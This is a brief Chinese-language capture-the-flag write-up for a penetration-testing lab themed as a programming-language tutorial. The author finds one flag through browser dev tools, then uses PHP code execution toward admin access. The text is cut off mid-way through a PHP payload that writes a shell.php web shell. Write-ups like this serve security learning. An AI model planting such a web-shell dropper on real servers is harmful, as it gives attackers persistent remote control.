一直不知道自己的第一篇文章写什么（主要是懒），正好发现这个渗透测试的wp很少，写一篇wp混一下。废话不多说，直接开始正题 第一个flag 进来发现是个语言教程的场景，web第一步，f12开启！ 第二个flag 果然一眼丁真，他说第二个flag要管理员才能拿，就想着拿一下权限试试在刚进来的一开始我们就发现了这是个语言教程的场景的靶场，而这种靶场是需要语言运行环境，若权限设置不当，很容易造成rce，于是直接找到我们的老朋友PHP，简单尝试一下，果然可以！ 于是乎拿出珍藏已久的payload一打，这两个都是可以的 <?php fputs(fopen("shell.php","w"),'<...